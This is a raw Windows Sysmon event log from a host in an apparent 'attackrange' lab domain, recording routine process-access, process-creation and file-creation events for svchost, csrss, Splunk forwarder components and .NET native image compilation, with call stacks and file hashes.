13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91BF-6005-0C03-00000000A301}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91BF-6005-0C03-00000000A301}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.279{59A5CD1D-91BF-6005-0C03-00000000A301}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.934{59A5CD1D-91C0-6005-0F03-00000000A301}14644200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91C0-6005-0F03-00000000A301}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C0-6005-0F03-00000000A301}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.778{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91C0-6005-0F03-00000000A301}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.779{59A5CD1D-91C0-6005-0F03-00000000A301}1464C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.653{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C0-6005-0E03-00000000A301}3648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.637{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C0-6005-0E03-00000000A301}3648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.637{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91C0-6005-0E03-00000000A301}3648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:48.403{59A5CD1D-91BC-6005-0903-00000000A301}884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\374-0\System.Data.dll2021-01-18 13:48:48.403 10341000x80000000000000007317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.247{59A5CD1D-91C0-6005-0D03-00000000A301}45884888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91C0-6005-0D03-00000000A301}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 